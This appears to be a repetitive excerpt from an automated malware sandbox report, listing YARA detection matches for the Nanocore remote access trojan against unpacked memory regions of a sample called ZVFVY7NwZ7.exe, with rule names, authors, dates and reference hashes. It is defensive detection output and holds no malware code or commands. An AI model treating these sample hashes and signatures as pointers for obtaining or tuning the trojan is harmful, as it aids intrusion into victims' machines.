Source: 0.2.ZVFVY7NwZ7.exe.2edc690.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.ZVFVY7NwZ7.exe.2edc690.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ZVFVY7NwZ7.exe.2edc690.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.ZVFVY7NwZ7.exe.6040000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6040000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.5670000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.5670000.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6450000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6450000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6420000.16.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6420000.16.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6744c9f.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6744c9f.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.409e360.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.409e360.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6740000.24.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6740000.24.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.ZVFVY7NwZ7.exe.5670000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.5670000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6790000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6790000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6400000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6400000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.2ecdb24.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.2ecdb24.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6470000.18.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6470000.18.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6480000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6480000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.408a169.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.408a169.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.5420000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.5420000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6494629.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6494629.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.ZVFVY7NwZ7.exe.6790000.26.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6790000.26.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6420000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6420000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6040000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6040000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6490000.21.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6490000.21.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6490000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6490000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.ZVFVY7NwZ7.exe.6740000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6740000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.4085b40.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.4085b40.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6450000.17.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6450000.17.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.4085b40.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.4085b40.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.2ec18dc.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.2ec18dc.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.ZVFVY7NwZ7.exe.63f0000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.63f0000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.6470000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.ZVFVY7NwZ7.exe.6470000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.ZVFVY7NwZ7.exe.2ecdb24.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.ZVFVY7NwZ7.exe.2ebcaa0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.ZVFVY7NwZ7.exe.3eff6b0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
